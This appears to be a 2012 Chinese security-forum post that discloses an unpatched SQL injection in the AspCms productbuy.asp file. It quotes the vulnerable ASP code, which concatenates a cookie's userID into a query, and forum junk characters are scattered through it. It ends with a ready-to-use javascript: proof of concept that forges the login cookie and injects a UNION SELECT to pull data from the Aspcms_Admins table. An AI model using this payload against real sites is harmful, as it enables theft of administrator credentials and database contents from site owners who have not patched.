好久没上土司了,上来一看发现在删号名单内.....
& c. K( ^# n9 Y2 i" A3 M也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。7 c4 u' k9 ^% [) m. w/ J
废话不多说,看代码:/ _, ~5 @( U& t. `- M2 `( B
% d# } _5 s1 h3 E* I<%' O$ c% F. O- v' C D% ^
7 K1 S, ]8 H8 u! r9 kif action = "buy" then
% b: G) G% V$ I' E3 l. z7 e# d& a- h5 E2 L6 Y8 y
addOrder()
' s0 A4 R2 W( Q, K+ p1 y
+ r( C, T) w+ h! ]7 G! d7 f2 d7 Welse
' s3 f9 F8 T" B: L/ B e2 |8 X, G$ |4 o8 h5 t
echoContent()
X$ W, e3 e* |& j& _2 J' N6 h& u
end if
* n* o( M& R% {7 w' z+ P% a) y- k' s# k4 u" Y
8 I, \2 k+ @" \; ~8 [- C$ b& U" t2 \
……略过
! o- I8 j. E3 J( h& H1 F2 u- n' Z, }: i8 l( ?5 ^- E
& ^" v& j' i# O. H
2 N- M) F+ d% o$ \5 P7 T
Sub echoContent()
% {! p2 X+ G: Z$ B# \9 Y8 x# ^) C' M: G6 d2 a: K
dim id
, ?9 \4 T7 E1 j- J: f. `2 Q* ^2 }- y, i3 o: G- c
id=getForm("id","get")6 _: R7 ]- v* ]) V& U. z6 p7 G
. U2 B1 {5 k: z$ y) ^
9 ^6 M: W% | d, p M Z
9 D8 ?! `- }' r if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 5 T6 k% G# n# }1 f3 R
1 H T* V! ~* Y- k" D9 R + `/ T5 e" ^- ^$ M$ ^- j
* T- r- u4 L! ^* g
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") q) R0 b8 x1 A* [' W
* c0 h6 p' J/ Q* g! E. r dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct6 W- g( V7 Q5 e& C4 y8 u7 [: c
" X3 h% e6 _) l+ Y/ e6 R9 ], ?
Dim templatePath,tempStr
# U9 y3 V1 D0 c8 w; b" K! s0 R( W l+ c* e$ w; E, `
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"1 `% \0 c# ]3 w0 A. w: K
3 v8 e9 o( i) I" R
) R9 L) [& h6 p3 ]
1 v( |0 P3 o/ p' F) ^0 x' ? set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")1 F4 T, T4 Y+ C% w0 O* t1 e, ?$ g
7 ^: Q ]# ^- ?) I selectproduct=rsObj(0)
' ` ?, z% O* q: F0 Y" [( \! J7 ` \- F
]- S6 A% F/ X. a$ p" m: N
9 W4 ]3 J& ]; B# f Dim linkman,gender,phone,mobile,email,qq,address,postcode
2 a' b0 s& D: p, i' ]2 k$ i0 G+ x/ x f8 W$ O# r& b. z
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
W) b3 F( V/ r% p+ `* M# {* }6 c) B7 P; x8 p8 a
if rCookie("loginstatus")=1 then
+ o( A4 O0 ?2 i0 L
. x& d3 k" ~8 M4 ~ set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
* E; N5 I% h+ E6 V, v$ m, V7 |6 L7 l2 O6 T: U, Q* Y/ V
linkman=rsObj("truename")! F: c: |* X" q1 H0 k
3 ]* D/ C3 V& Z: I
gender=rsObj("gender"); h' G% t) D D; n1 ]3 t
! e0 u' d+ l9 }# l) E8 G' u% k phone=rsObj("phone")
0 c: n& k9 U( E4 W& P4 v6 _4 W. @6 ]' m$ P* N
mobile=rsObj("mobile")
5 x. f: g( o2 Q6 ], f
8 f1 i; @9 T* [" \. k3 m email=rsObj("email")2 Y8 _/ `, ]: Y+ X6 h
; p+ E. J* @. O% y4 t/ b$ m
qq=rsObj("qq")
3 I$ Q3 \; E9 _5 h1 @6 D! Y( K' `3 \, Z1 ?1 j% v, r- @
address=rsObj("address")9 t3 `$ H7 y" E5 J
0 S0 b; z( ]' Q/ {6 r postcode=rsObj("postcode")% N6 k$ y9 _/ z1 j
Y, T! A. ~9 O: e else
4 F3 p) G* j- H
( k( S0 h; S$ s; }3 Y gender=1/ D3 t2 t0 b. Q. a: F3 r
) e* q0 o8 B( a6 g, y5 F
end if
$ n: C- q5 b& Y* }
+ i, k# T& D, @2 e" M0 t rsObj.close()
2 ?$ {' t2 d* ]
: S9 m; j5 w& m+ `: S8 ^
( N( k3 \ |' V/ H* @2 Z0 _) g$ _; D" D1 m
with templateObj
, s) Y! j- j% g% M" ^" M" b4 Y, H4 ?8 g
.content=loadFile(templatePath)
& t) N( r! z f- ]' [0 L% ^7 h* k& r
.parseHtml(), F7 \* B, t; h% o
: {+ n: v. a7 @% E" _; t% _
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
0 n. ^& v0 ^# I$ d; y* t4 B0 A& j
# d" q/ \% ?! ^ .content=replaceStr(.content,"[aspcms:linkman]",linkman) ' l( g/ W+ v& V! f1 s4 i
! i/ W. d3 y" r8 P .content=replaceStr(.content,"[aspcms:gender]",gender)
) H# t4 p& r$ G4 Z
0 c8 K: @9 g; C. D8 w .content=replaceStr(.content,"[aspcms:phone]",phone)
3 Z& q O% \6 @/ @/ b' U6 j- ]( h7 V f3 E& w* ^
.content=replaceStr(.content,"[aspcms:mobile]",mobile) $ A/ v) k' r7 f) p* ^
2 n4 a; A4 o) `! `: b .content=replaceStr(.content,"[aspcms:email]",email) : ^9 w i4 T4 ?9 y z8 K
1 l- b, T% z+ O$ ^; h
.content=replaceStr(.content,"[aspcms:qq]",qq) , x" W5 X2 o, d6 x5 E, i2 r+ V
Z, M7 | o6 A
.content=replaceStr(.content,"[aspcms:address]",address)
8 V, ~1 Q# i5 H6 ~( ]
) u9 w/ D! l/ l: ?; D1 O9 [' P! u9 N .content=replaceStr(.content,"[aspcms:postcode]",postcode)
7 J, X: O( w! D, A) @! k( k( X% s# b' R' d$ b4 F7 K
.parseCommon() % ^( f! v7 h8 @) K* H/ {8 A* ^
3 f% f* ]2 _* S/ | echo .content
% {3 L0 }+ T/ l0 J# W- z( H8 l, Y% }+ r
end with
& V! g/ h1 j f; ~" i9 T
5 I9 A* O5 v ]2 S& E9 A set templateobj =nothing : terminateAllObjects
1 B) p$ y( C# |6 N% R; x" b0 W3 v
; e8 ]% t% T" a7 K- p. q C! n2 n6 dEnd Sub! n' a( }! @# W
漏洞很明显,没啥好说的2 b+ ^- I- ^2 v1 G$ p
poc:* D! C! D- n5 Z+ p0 ~6 L0 Y3 z
2 C0 h) ~! Q! x! G F& n6 O
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子6 l$ }5 g1 C1 m$ y
: `0 K# J1 h* v( ~
|
发表于 2012-12-27 08:35:05
收藏
支持
反对